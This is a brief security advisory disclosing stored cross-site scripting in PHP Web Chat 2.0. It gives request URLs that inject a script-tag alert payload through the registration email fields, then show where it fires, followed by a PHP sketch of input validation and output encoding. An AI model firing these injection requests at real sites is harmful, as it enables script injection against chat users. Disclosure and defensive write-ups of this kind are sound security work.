Over_G
25/03/03, 18:20
Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------
Actions:
1) Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>
2) Request the lost password and the XSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG
3) View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog@ukr.net
Best regards, Over G[DWC Gr0up]
P.S. Sorry for my English :)
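
A defensive sketch for the flow in steps 1-3, added here and not taken from PHP Web Chat or from the advisory: check the email and email1 parameters at registration, and HTML-encode the stored values on every page that prints them. The function names validate_email_field and html_out and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not PHP Web Chat's own code. Function names are hypothetical.

// Input side: refuse to store anything that is not a syntactically valid
// address (the email and email1 parameters of register.php).
function validate_email_field(string $raw): ?string
{
    $value = trim($raw);
    if ($value === '' || strlen($value) > 254) {
        return null;
    }
    $ok = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

// Output side: encode at the point of printing, on every page that shows
// the stored value (the lost-password and profile views in the advisory).
function html_out(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: one ordinary address and the advisory's test
// string written out in full.
$samples = [
    'overg@example.org',
    '<script>alert("Test!")</script>',
];

foreach ($samples as $input) {
    $accepted = validate_email_field($input);
    printf(
        "input=%s\n  stored:   %s\n  rendered: %s\n",
        $input,
        $accepted === null ? 'rejected at registration' : $accepted,
        // Encoding is applied even to values that failed validation, because
        // rows stored before the check existed are still in the database.
        html_out($input)
    );
}
```

Validation narrows what gets stored, but the output encoding is the control that keeps a stored value from being interpreted as markup, so it belongs on every page that echoes user-supplied fields.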